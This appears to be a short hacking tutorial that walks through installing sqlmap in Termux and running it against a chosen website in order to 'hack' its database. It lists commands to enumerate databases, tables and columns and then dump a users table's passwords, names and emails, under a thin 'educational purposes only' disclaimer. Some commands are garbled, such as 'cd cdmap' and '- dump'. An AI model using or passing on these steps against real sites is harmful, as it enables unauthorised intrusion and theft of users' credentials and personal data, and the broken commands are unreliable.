-->

Hacking with SQL Injection tool step by step

Sql Injection is a tool that can be downloaded and used in termux, in this tutorial we will use it raw

<* For educational purposes only, we won't take any blame if caught using this to hack private database*>

Looking for a website database to hack into

$ pkg update

$ pkg upgrade

$ pkg install git

$ git clone https://github.com/sqlmapproject/sqlmap
cd cdmap
$ pkg install python

$ pkg install python2

$ python2 sqlmap.py --url (enter the target website address) --dbs

$ python2 sqlmap.py --url (enter the target website address) -D (enter dbs) --tables

$ python2 sqlmap.py --url (enter the target website address) -D (dbs) -T tbl_menu --columns

$ python2 sqlmap.py --url (enter the target website address) -D (dbs) -T users --columns

$ python2 sqlmap.py --url (enter the target website address) -D (dbs) -T users -C pass, name, mail - dump